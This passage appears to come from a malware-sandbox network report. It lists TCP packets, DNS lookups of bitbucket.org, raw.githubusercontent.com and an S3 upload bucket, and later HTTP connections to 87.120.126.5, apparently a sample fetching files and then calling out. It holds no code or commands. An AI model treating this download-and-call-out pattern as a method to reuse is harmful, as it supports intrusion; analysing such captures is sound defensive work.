                                                                                                                    Jan 3, 2025 23:20:03.611470938 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.611521959 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.611529112 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.611552954 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.611566067 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.611815929 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.611829042 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.611881018 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.611888885 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.611917019 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.611941099 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.625516891 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.625545979 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.625585079 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.625593901 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.625607014 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.625634909 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.883404016 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.883419991 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.883548975 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.883563995 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.883598089 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.883610010 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.883620024 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.883630037 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.883672953 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.883711100 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.883955956 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.883970976 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.884030104 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.884037971 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.884084940 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.884403944 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.884421110 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.884478092 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.884479046 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.884488106 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.884511948 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.884531975 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.884573936 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.884578943 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.884624004 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.885025978 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.885059118 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.885086060 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.885092020 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.885116100 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.885135889 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.885174990 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.885190964 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.885246038 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.885251999 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.885293961 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.885822058 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.885845900 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.885890961 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.885894060 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.885904074 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.885922909 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.885947943 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.885953903 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.885967016 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.885993004 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.886075974 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.886089087 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.886143923 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.886151075 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.886189938 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.886786938 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.886801004 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.886854887 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.886862993 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.886905909 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.886946917 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.886960983 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.887011051 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.887017965 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.887032032 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.887051105 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.887051105 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.887058973 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.887089968 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.887119055 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.887777090 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.887789011 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.887840986 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.887847900 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.887859106 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.887877941 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.887887001 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.887892008 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.887928009 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.887968063 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:03.887978077 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:03.887996912 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.269962072 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.270123959 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.270138025 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.270193100 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.270200014 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.270221949 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.270242929 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.270356894 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.270375013 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.270416021 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.270422935 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.270452023 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.270468950 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.270823002 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.270837069 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.270900011 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.270905972 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.270948887 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.302073002 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.302088976 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.302161932 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.302180052 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.302227974 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.359707117 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.359725952 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.359775066 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.359786987 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.359827042 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.360032082 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.360047102 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.360102892 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.360110998 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.360171080 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.360368013 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.360382080 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.360434055 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.360441923 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.360486984 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.360696077 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.360711098 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.360758066 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.360764980 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.360805988 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.361025095 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.361041069 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.361083031 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.361088991 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.361099958 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.361217022 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.361455917 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.361470938 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.361514091 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.361524105 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.361547947 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.361571074 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.361764908 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.361787081 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.361821890 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.361829042 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.361860991 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.361876011 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.392862082 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.392887115 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.392925978 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.392934084 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.392945051 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.392978907 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.450393915 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.450412035 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.450493097 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.450501919 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.450548887 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.450752020 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.450767040 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.450822115 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.450829983 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.450875998 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.451044083 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.451059103 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.451107979 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.451114893 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.451131105 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.451375961 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.451396942 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.451407909 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.451414108 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.451431036 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.451467037 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.451472998 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.451515913 CET44349731185.199.111.133192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:04.451769114 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:04.451786041 CET49731443192.168.2.4185.199.111.133
                                                                                                                    Jan 3, 2025 23:20:08.320132971 CET49732443192.168.2.4185.166.143.48
                                                                                                                    Jan 3, 2025 23:20:08.320175886 CET44349732185.166.143.48192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:08.320262909 CET49732443192.168.2.4185.166.143.48
                                                                                                                    Jan 3, 2025 23:20:08.320502043 CET49732443192.168.2.4185.166.143.48
                                                                                                                    Jan 3, 2025 23:20:08.320518017 CET44349732185.166.143.48192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:09.954029083 CET44349732185.166.143.48192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:09.957935095 CET49732443192.168.2.4185.166.143.48
                                                                                                                    Jan 3, 2025 23:20:09.957959890 CET44349732185.166.143.48192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:10.441792965 CET44349732185.166.143.48192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:10.441813946 CET44349732185.166.143.48192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:10.441854954 CET49732443192.168.2.4185.166.143.48
                                                                                                                    Jan 3, 2025 23:20:10.441881895 CET44349732185.166.143.48192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:10.441895008 CET44349732185.166.143.48192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:10.441898108 CET49732443192.168.2.4185.166.143.48
                                                                                                                    Jan 3, 2025 23:20:10.441929102 CET49732443192.168.2.4185.166.143.48
                                                                                                                    Jan 3, 2025 23:20:10.442250013 CET49732443192.168.2.4185.166.143.48
                                                                                                                    Jan 3, 2025 23:20:10.471693039 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:10.471738100 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:10.471807003 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:10.472054005 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:10.472075939 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.047230959 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.047307968 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.050082922 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.050091028 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.050298929 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.051475048 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.099333048 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.188899040 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.191291094 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.191307068 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.191364050 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.191385031 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.191397905 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.191441059 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.193965912 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.194013119 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.279695034 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.279715061 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.279778004 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.279788971 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.279844046 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.280024052 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.280961037 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.280977964 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.281012058 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.281018972 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.281055927 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.320521116 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.369245052 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.369291067 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.369308949 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.369318962 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.369364023 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.369416952 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.369472980 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.369479895 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.369492054 CET4434973352.216.138.83192.168.2.4
                                                                                                                    Jan 3, 2025 23:20:11.369527102 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:20:11.369695902 CET49733443192.168.2.452.216.138.83
                                                                                                                    Jan 3, 2025 23:24:00.811568975 CET5001980192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:00.811629057 CET5002080192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:00.811736107 CET5002080192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:00.816463947 CET805002087.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:24:01.164522886 CET5002080192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:01.169389009 CET805002087.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:24:01.422911882 CET805002087.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:24:01.508184910 CET5002080192.168.2.487.120.126.5
                                                                                                                    Jan 3, 2025 23:24:01.554022074 CET805002087.120.126.5192.168.2.4
                                                                                                                    Jan 3, 2025 23:24:01.711321115 CET5002080192.168.2.487.120.126.5
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
| Jan 3, 2025 23:19:58.668076038 CET | 59635 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 3, 2025 23:19:58.674969912 CET | 53 | 59635 | 1.1.1.1 | 192.168.2.4 |
| Jan 3, 2025 23:20:00.309508085 CET | 52390 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 3, 2025 23:20:00.316374063 CET | 53 | 52390 | 1.1.1.1 | 192.168.2.4 |
| Jan 3, 2025 23:20:10.442970991 CET | 52802 | 53 | 192.168.2.4 | 1.1.1.1 |
| Jan 3, 2025 23:20:10.462954998 CET | 53 | 52802 | 1.1.1.1 | 192.168.2.4 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Jan 3, 2025 23:19:58.668076038 CET | 192.168.2.4 | 1.1.1.1 | 0x41e5 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:00.309508085 CET | 192.168.2.4 | 1.1.1.1 | 0xa99a | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:10.442970991 CET | 192.168.2.4 | 1.1.1.1 | 0x9d12 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Jan 3, 2025 23:19:58.674969912 CET | 1.1.1.1 | 192.168.2.4 | 0x41e5 | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:19:58.674969912 CET | 1.1.1.1 | 192.168.2.4 | 0x41e5 | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:19:58.674969912 CET | 1.1.1.1 | 192.168.2.4 | 0x41e5 | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:00.316374063 CET | 1.1.1.1 | 192.168.2.4 | 0xa99a | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:00.316374063 CET | 1.1.1.1 | 192.168.2.4 | 0xa99a | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:00.316374063 CET | 1.1.1.1 | 192.168.2.4 | 0xa99a | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:00.316374063 CET | 1.1.1.1 | 192.168.2.4 | 0xa99a | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:10.462954998 CET | 1.1.1.1 | 192.168.2.4 | 0x9d12 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 3, 2025 23:20:10.462954998 CET | 1.1.1.1 | 192.168.2.4 | 0x9d12 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 3, 2025 23:20:10.462954998 CET | 1.1.1.1 | 192.168.2.4 | 0x9d12 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.138.83 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:10.462954998 CET | 1.1.1.1 | 192.168.2.4 | 0x9d12 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.168.241 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:10.462954998 CET | 1.1.1.1 | 192.168.2.4 | 0x9d12 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.24.140 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:10.462954998 CET | 1.1.1.1 | 192.168.2.4 | 0x9d12 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.228.137 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:10.462954998 CET | 1.1.1.1 | 192.168.2.4 | 0x9d12 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.114.161 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:10.462954998 CET | 1.1.1.1 | 192.168.2.4 | 0x9d12 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.114.41 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:10.462954998 CET | 1.1.1.1 | 192.168.2.4 | 0x9d12 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.11.213 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:10.462954998 CET | 1.1.1.1 | 192.168.2.4 | 0x9d12 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.15.177.90 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:12.718255997 CET | 1.1.1.1 | 192.168.2.4 | 0xc094 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
